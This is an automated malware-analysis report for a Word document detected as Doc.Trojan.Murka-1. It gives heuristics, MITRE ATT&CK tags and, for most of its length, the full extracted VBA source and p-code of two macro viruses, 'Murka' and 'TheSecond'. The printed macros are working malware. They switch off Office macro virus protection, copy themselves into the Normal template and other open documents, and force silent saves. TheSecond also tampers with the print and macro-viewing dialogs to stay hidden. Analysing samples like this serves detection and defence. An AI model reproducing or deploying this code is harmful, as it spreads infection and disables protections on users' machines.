MALICIOUS
188
Risk Score
Malware Insights
MITRE ATT&CK
T1566.001 Spearphishing Attachment
T1059.005 Visual Basic
T1553.005 Mark-of-the-Web Bypass
The sample contains VBA macros that attempt to disable macro security protections and replicate themselves, as indicated by the 'OLE_VBA_MACRO_VIRUS_REPLICATION' heuristic. The embedded VBA code, identified as 'Murka', explicitly mentions anti-virus evasion and self-replication. The ClamAV detection 'Doc.Trojan.Murka-1' further supports the classification of this file as a malicious document.
Heuristics 5
-
ClamAV: Doc.Trojan.Murka-1 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Trojan.Murka-1
-
VBA macros detected medium 2 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
VBA macro-virus self-replication / AV tampering critical OLE_VBA_MACRO_VIRUS_REPLICATIONVBA macro programmatically rewrites VBA project code through the VBE object model (CodeModule/VBComponents InsertLines/DeleteLines/AddFromString or OrganizerCopy) to copy itself into the global template and other open documents, and/or disables Office macro-virus protection (Options.VirusProtection = False). This is the defining behavior of the W97M document macro-virus family — self-replicating code with no benign document use, independent of any AV signature.Matched line in script
.DeleteLines i, j -
Auto_Close macro low OLE_VBA_AUTOCLOSEAuto_Close macroMatched line in script
Sub AutoClose() -
Legacy WordBasic macro-virus markers high OLE_LEGACY_WORDBASIC_MACRO_VIRUSOLE Word document contains legacy WordBasic auto-execution macro markers such as AutoOpen plus ToolsMacro/MacroFile/fileMacro/globMacro or named historical macro-virus strings. These old Word 6/95 macro forms are not exposed as a modern VBA project, so normal VBA source extraction can miss them.
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 16387 bytes |
SHA-256: 08a6e1817b5f1cb5f8b8875737f1663e957f75b23e73a3cfecbf9cd9f2ead516 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Close()
'*************************************************************************
'Murka - Это самый маленький из всех известных МакроАнтивирусных модулей!
'Принцип действия: Загружается вместе с документом и блокирует
' распространение зараженных модулей
'
'Условия распространения: Freeware(Свободно)
'Достоинства: Корректная работа, надежность!
'Недостатки: Пока не нашел
'
'"Все это, конечно, хорошо, но я ни хрена не понял, как его
' можно преобрести?!" - гневно скажешь ты. Можно!
'Дед MustDie вам все раскажет!
'Необходимо лишь открыть документ на персональном
'компе. где уже установлен антивирусный модуль Murka.
'
'Автору: mustdie@chat.ru
'Murke: murka@chat.ru
'Данилову: antivir@dials.ru
'*************************************************************************
On Error Resume Next
Dim s As Boolean
Dim i As Long
Dim j As Long
Dim Murka As String
Dim Other As String
Dim str As String
s = ActiveDocument.Saved
Application.EnableCancelKey = wdCancelDisabled
With Options: .VirusProtection = 0: .SaveNormalPrompt = 0: End With
str = "Document_Close"
With MacroContainer.VBProject.VBComponents.Item(1).CodeModule
i = .ProcBodyLine(str, vbext_pk_Proc)
j = .ProcCountLines(str, vbext_pk_Proc)
Murka = .Lines(i, j)
End With
With NormalTemplate.VBProject.VBComponents.Item(1).CodeModule
i = .ProcBodyLine(str, vbext_pk_Proc)
j = .ProcCountLines(str, vbext_pk_Proc)
Other = .Lines(i, j)
If Other <> Murka And Murka <> "" Then
.DeleteLines i, j
.InsertLines 1, Murka
NormalTemplate.Save
End If
End With
With ActiveDocument.VBProject.VBComponents.Item(1).CodeModule
i = .ProcBodyLine(str, vbext_pk_Proc)
j = .ProcCountLines(str, vbext_pk_Proc)
Other = .Lines(i, j)
If Other <> Murka And Murka <> "" Then
.DeleteLines i, j
.InsertLines 1, Murka
Randomize
If Rnd < 0.3 Then With Dialogs(wdDialogFileSummaryInfo): .Title = "Murka3": .Author = "M&M": .Execute: End With
If Left(ActiveDocument.Name, 8) = "Document" Or Left(ActiveDocument.Name, 8) = "Документ" Then
Else
ActiveDocument.SaveAs FileName:=ActiveDocument.FullName
End If
End If
End With
If ActiveDocument.Saved <> s Then ActiveDocument.Saved = s
End Sub
Attribute VB_Name = "TheSecond"
Sub AutoClose()
Copyrights = "The Second, 2000"
NickName = "Revenger"
Options.VirusProtection = False
flag = False
If Documents.Count >= 1 Then
counter = NormalTemplate.VBProject.VBComponents.Count
For i = 1 To counter
If NormalTemplate.VBProject.VBComponents.Item(i).Name = "TheSecond" Then flag = True
Next i
x = Application.StartupPath + "\TheSecond.tmp"
If Not flag Then
ActiveDocument.VBProject.VBComponents("TheSecond").Export (x)
NormalTemplate.VBProject.VBComponents.Import (x)
End If
flag = False
infected = False
havesave = ActiveDocument.Saved
For i = 1 To ActiveDocument.VBProject.VBComponents.Count
If ActiveDocument.VBProject.VBComponents.Item(i).Name = "TheSecond" Then flag = True
Next i
If Not flag Then
NormalTemplate.VBProject.VBComponents("TheSecond").Export (x)
ActiveDocument.VBProject.VBComponents.Import (x)
infected = True
End If
If havesave And infected And (Left(ActiveDocument.Name, 8) <> "Документ") Then
Dialogs(wdDialogFileSaveAs).Execute
End If
ActiveDocument.Saved = havesave
End If
End Sub
Sub FilePrint()
Selection.Find.ClearFormatting
Selection.Find.Replacement.ClearFormatting
With Selection.Find
.Text = "Нюбин"
.Replacement.Text = "Нудин"
.Forward = True
.Wrap = wdFindContinue
.Format = False
.MatchCase = False
.MatchWholeWord = False
.MatchWildcards = False
End With
Selection.Find.Execute Replace:=wdReplaceAll
Dialogs(wdDialogFilePrint).Show
Selection.Find.ClearFormatting
Selection.Find.Replacement.ClearFormatting
With Selection.Find
.Text = "Нудин"
.Replacement.Text = "Нюбин"
.Forward = True
.Wrap = wdFindContinue
.Format = False
.MatchCase = False
.MatchWholeWord = False
.MatchWildcards = False
End With
Selection.Find.Execute Replace:=wdReplaceAll
End Sub
Sub toolsmacro()
Dialogs(wdDialogToolsMacro).Display
End Sub
Sub ViewVBCode()
MsgBox ("Нет загруженных макросов!")
End Sub
' Processing file: /tmp/qstore_js8njdiw
' ===============================================================================
' Module streams:
' Macros/VBA/ThisDocument - 9631 bytes
' Line #0:
' FuncDefn (Private Sub Document_Close())
' Line #1:
' QuoteRem 0x0000 0x0049 "*************************************************************************"
' Line #2:
' QuoteRem 0x0000 0x0048 "Murka - Это самый маленький из всех известных МакроАнтивирусных модулей!"
' Line #3:
' QuoteRem 0x0000 0x003D "Принцип действия: Загружается вместе с документом и блокирует"
' Line #4:
' QuoteRem 0x0000 0x0033 " распространение зараженных модулей"
' Line #5:
' QuoteRem 0x0000 0x0000 ""
' Line #6:
' QuoteRem 0x0000 0x002B "Условия распространения: Freeware(Свободно)"
' Line #7:
' QuoteRem 0x0000 0x0037 "Достоинства: Корректная работа, надежность!"
' Line #8:
' QuoteRem 0x0000 0x0026 "Недостатки: Пока не нашел"
' Line #9:
' QuoteRem 0x0000 0x0000 ""
' Line #10:
' QuoteRem 0x0000 0x003A ""Все это, конечно, хорошо, но я ни хрена не понял, как его"
' Line #11:
' QuoteRem 0x0000 0x0030 " можно преобрести?!" - гневно скажешь ты. Можно!"
' Line #12:
' QuoteRem 0x0000 0x001D "Дед MustDie вам все раскажет!"
' Line #13:
' QuoteRem 0x0000 0x0030 "Необходимо лишь открыть документ на персональном"
' Line #14:
' QuoteRem 0x0000 0x0034 "компе. где уже установлен антивирусный модуль Murka."
' Line #15:
' QuoteRem 0x0000 0x0000 ""
' Line #16:
' QuoteRem 0x0000 0x0019 "Автору: mustdie@chat.ru"
' Line #17:
' QuoteRem 0x0000 0x0017 "Murke: murka@chat.ru"
' Line #18:
' QuoteRem 0x0000 0x001A "Данилову: antivir@dials.ru"
' Line #19:
' QuoteRem 0x0000 0x0049 "*************************************************************************"
' Line #20:
' OnError (Resume Next)
' Line #21:
' Dim
' VarDefn s (As Boolean)
' Line #22:
' Dim
' VarDefn i (As Long)
' Line #23:
' Dim
' VarDefn j (As Long)
' Line #24:
' Dim
' VarDefn Murka (As String)
' Line #25:
' Dim
' VarDefn Other (As String)
' Line #26:
' Dim
' VarDefn str (As String)
' Line #27:
' Ld ActiveDocument
' MemLd Saved
' St s
' Line #28:
' Ld wdCancelDisabled
' Ld Application
' MemSt EnableCancelKey
' Line #29:
' StartWithExpr
' Ld Options
' With
' BoS 0x0000
' LitDI2 0x0000
' MemStWith VirusProtection
' BoS 0x0000
' LitDI2 0x0000
' MemStWith SaveNormalPrompt
' BoS 0x0000
' EndWith
' Line #30:
' LitStr 0x000E "Document_Close"
' St str
' Line #31:
' StartWithExpr
' LitDI2 0x0001
' Ld MacroContainer
' MemLd VBProject
' MemLd VBComponents
' ArgsMemLd Item 0x0001
' MemLd CodeModule
' With
' Line #32:
' Ld str
' Ld vbext_pk_Proc
' ArgsMemLdWith ProcBodyLine 0x0002
' St i
' Line #33:
' Ld str
' Ld vbext_pk_Proc
' ArgsMemLdWith ProcCountLines 0x0002
' St j
' Line #34:
' Ld i
' Ld j
' ArgsMemLdWith Lines 0x0002
' St Murka
' Line #35:
' EndWith
' Line #36:
' StartWithExpr
' LitDI2 0x0001
' Ld NormalTemplate
' MemLd VBProject
' MemLd VBComponents
' ArgsMemLd Item 0x0001
' MemLd CodeModule
' With
' Line #37:
' Ld str
' Ld vbext_pk_Proc
' ArgsMemLdWith ProcBodyLine 0x0002
' St i
' Line #38:
' Ld str
' Ld vbext_pk_Proc
' ArgsMemLdWith ProcCountLines 0x0002
' St j
' Line #39:
' Ld i
' Ld j
' ArgsMemLdWith Lines 0x0002
' St Other
' Line #40:
' Ld Other
' Ld Murka
' Ne
' Ld Murka
' LitStr 0x0000 ""
' Ne
' And
' IfBlock
' Line #41:
' Ld i
' Ld j
' ArgsMemCallWith DeleteLines 0x0002
' Line #42:
' LitDI2 0x0001
' Ld Murka
' ArgsMemCallWith InsertLines 0x0002
' Line #43:
' Ld NormalTemplate
' ArgsMemCall Save 0x0000
' Line #44:
' EndIfBlock
' Line #45:
' EndWith
' Line #46:
' StartWithExpr
' LitDI2 0x0001
' Ld ActiveDocument
' MemLd VBProject
' MemLd VBComponents
' ArgsMemLd Item 0x0001
' MemLd CodeModule
' With
' Line #47:
' Ld str
' Ld vbext_pk_Proc
' ArgsMemLdWith ProcBodyLine 0x0002
' St i
' Line #48:
' Ld str
' Ld vbext_pk_Proc
' ArgsMemLdWith ProcCountLines 0x0002
' St j
' Line #49:
' Ld i
' Ld j
' ArgsMemLdWith Lines 0x0002
' St Other
' Line #50:
' Ld Other
' Ld Murka
' Ne
' Ld Murka
' LitStr 0x0000 ""
' Ne
' And
' IfBlock
' Line #51:
' Ld i
' Ld j
' ArgsMemCallWith DeleteLines 0x0002
' Line #52:
' LitDI2 0x0001
' Ld Murka
' ArgsMemCallWith InsertLines 0x0002
' Line #53:
' ArgsCall Read 0x0000
' Line #54:
' Ld Rnd
' LitR8 0x3333 0x3333 0x3333 0x3FD3
' Lt
' If
' BoSImplicit
' StartWithExpr
' Ld wdDialogFileSummaryInfo
' ArgsLd Dialogs 0x0001
' With
' BoS 0x0000
' LitStr 0x0006 "Murka3"
' MemStWith Title
' BoS 0x0000
' LitStr 0x0003 "M&M"
' MemStWith Author
' BoS 0x0000
' ArgsMemCallWith Execute 0x0000
' BoS 0x0000
' EndWith
' EndIf
' Line #55:
' Ld ActiveDocument
' MemLd New
' LitDI2 0x0008
' ArgsLd LBound 0x0002
' LitStr 0x0008 "Document"
' Eq
' Ld ActiveDocument
' MemLd New
' LitDI2 0x0008
' ArgsLd LBound 0x0002
' LitStr 0x0008 "Документ"
' Eq
' Or
' IfBlock
' Line #56:
' ElseBlock
' Line #57:
' Ld ActiveDocument
' MemLd FullName
' ParamNamed FileName
' Ld ActiveDocument
' ArgsMemCall SaveAs 0x0001
' Line #58:
' EndIfBlock
' Line #59:
' EndIfBlock
' Line #60:
' EndWith
' Line #61:
' Ld ActiveDocument
' MemLd Saved
' Ld s
' Ne
' If
' BoSImplicit
' Ld s
' Ld ActiveDocument
' MemSt Saved
' EndIf
' Line #62:
' EndSub
' Macros/VBA/TheSecond - 3728 bytes
' Line #0:
' FuncDefn (Sub AutoClose())
' Line #1:
' LitStr 0x0010 "The Second, 2000"
' St Copyrights
' Line #2:
' LitStr 0x0008 "Revenger"
' St NickName
' Line #3:
' LitVarSpecial (False)
' Ld Options
' MemSt VirusProtection
' Line #4:
' LitVarSpecial (False)
' St flag
' Line #5:
' Ld Documents
' MemLd Count
' LitDI2 0x0001
' Ge
' IfBlock
' Line #6:
' Ld NormalTemplate
' MemLd VBProject
' MemLd VBComponents
' MemLd Count
' St counter
' Line #7:
' StartForVariable
' Ld i
' EndForVariable
' LitDI2 0x0001
' Ld counter
' For
' Line #8:
' Ld i
' Ld NormalTemplate
' MemLd VBProject
' MemLd VBComponents
' ArgsMemLd Item 0x0001
' MemLd New
' LitStr 0x0009 "TheSecond"
' Eq
' If
' BoSImplicit
' LitVarSpecial (True)
' St flag
' EndIf
' Line #9:
' StartForVariable
' Ld i
' EndForVariable
' NextVar
' Line #10:
' Ld Application
' MemLd StartupPath
' LitStr 0x000E "\TheSecond.tmp"
' Add
' St x
' Line #11:
' Ld flag
' Not
' IfBlock
' Line #12:
' Ld x
' Paren
' LitStr 0x0009 "TheSecond"
' Ld ActiveDocument
' MemLd VBProject
' ArgsMemLd VBComponents 0x0001
' ArgsMemCall Export 0x0001
' Line #13:
' Ld x
' Paren
' Ld NormalTemplate
' MemLd VBProject
' MemLd VBComponents
' ArgsMemCall Import 0x0001
' Line #14:
' EndIfBlock
' Line #15:
' LitVarSpecial (False)
' St flag
' Line #16:
' LitVarSpecial (False)
' St infected
' Line #17:
' Ld ActiveDocument
' MemLd Saved
' St havesave
' Line #18:
' StartForVariable
' Ld i
' EndForVariable
' LitDI2 0x0001
' Ld ActiveDocument
' MemLd VBProject
' MemLd VBComponents
' MemLd Count
' For
' Line #19:
' Ld i
' Ld ActiveDocument
' MemLd VBProject
' MemLd VBComponents
' ArgsMemLd Item 0x0001
' MemLd New
' LitStr 0x0009 "TheSecond"
' Eq
' If
' BoSImplicit
' LitVarSpecial (True)
' St flag
' EndIf
' Line #20:
' StartForVariable
' Ld i
' EndForVariable
' NextVar
' Line #21:
' Ld flag
' Not
' IfBlock
' Line #22:
' Ld x
' Paren
' LitStr 0x0009 "TheSecond"
' Ld NormalTemplate
' MemLd VBProject
' ArgsMemLd VBComponents 0x0001
' ArgsMemCall Export 0x0001
' Line #23:
' Ld x
' Paren
' Ld ActiveDocument
' MemLd VBProject
' MemLd VBComponents
' ArgsMemCall Import 0x0001
' Line #24:
' LitVarSpecial (True)
' St infected
' Line #25:
' EndIfBlock
' Line #26:
' Ld havesave
' Ld infected
' And
' Ld ActiveDocument
' MemLd New
' LitDI2 0x0008
' ArgsLd LBound 0x0002
' LitStr 0x0008 "Документ"
' Ne
' Paren
' And
' IfBlock
' Line #27:
' Ld wdDialogFileSaveAs
' ArgsLd Dialogs 0x0001
' ArgsMemCall Execute 0x0000
' Line #28:
' EndIfBlock
' Line #29:
' Ld havesave
' Ld ActiveDocument
' MemSt Saved
' Line #30:
' EndIfBlock
' Line #31:
' EndSub
' Line #32:
' FuncDefn (Sub FilePrint())
' Line #33:
' Ld Selection
' MemLd Find
' ArgsMemCall ClearFormatting 0x0000
' Line #34:
' Ld Selection
' MemLd Find
' MemLd Replacement
' ArgsMemCall ClearFormatting 0x0000
' Line #35:
' StartWithExpr
' Ld Selection
' MemLd Find
' With
' Line #36:
' LitStr 0x0005 "Нюбин"
' MemStWith Then
' Line #37:
' LitStr 0x0005 "Нудин"
' MemLdWith Replacement
' MemSt Then
' Line #38:
' LitVarSpecial (True)
' MemStWith Forward
' Line #39:
' Ld wdFindContinue
' MemStWith Wrap
' Line #40:
' LitVarSpecial (False)
' MemStWith Format$
' Line #41:
' LitVarSpecial (False)
' MemStWith MatchCase
' Line #42:
' LitVarSpecial (False)
' MemStWith MatchWholeWord
' Line #43:
' LitVarSpecial (False)
' MemStWith MatchWildcards
' Line #44:
' EndWith
' Line #45:
' Ld wdReplaceAll
' ParamNamed Replace
' Ld Selection
' MemLd Find
' ArgsMemCall Execute 0x0001
' Line #46:
' Ld wdDialogFilePrint
' ArgsLd Dialogs 0x0001
' ArgsMemCall Show 0x0000
' Line #47:
' Ld Selection
' MemLd Find
' ArgsMemCall ClearFormatting 0x0000
' Line #48:
' Ld Selection
' MemLd Find
' MemLd Replacement
' ArgsMemCall ClearFormatting 0x0000
' Line #49:
' StartWithExpr
' Ld Selection
' MemLd Find
' With
' Line #50:
' LitStr 0x0005 "Нудин"
' MemStWith Then
' Line #51:
' LitStr 0x0005 "Нюбин"
' MemLdWith Replacement
' MemSt Then
' Line #52:
' LitVarSpecial (True)
' MemStWith Forward
' Line #53:
' Ld wdFindContinue
' MemStWith Wrap
' Line #54:
' LitVarSpecial (False)
' MemStWith Format$
' Line #55:
' LitVarSpecial (False)
' MemStWith MatchCase
' Line #56:
' LitVarSpecial (False)
' MemStWith MatchWholeWord
' Line #57:
' LitVarSpecial (False)
' MemStWith MatchWildcards
' Line #58:
' EndWith
' Line #59:
' Ld wdReplaceAll
' ParamNamed Replace
' Ld Selection
' MemLd Find
' ArgsMemCall Execute 0x0001
' Line #60:
' EndSub
' Line #61:
' FuncDefn (Sub toolsmacro())
' Line #62:
' Ld wdDialogToolsMacro
' ArgsLd Dialogs 0x0001
' ArgsMemCall Display 0x0000
' Line #63:
' EndSub
' Line #64:
' FuncDefn (Sub ViewVBCode())
' Line #65:
' LitStr 0x0019 "Нет загруженных макросов!"
' Paren
' ArgsCall MsgBox 0x0001
' Line #66:
' EndSub
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.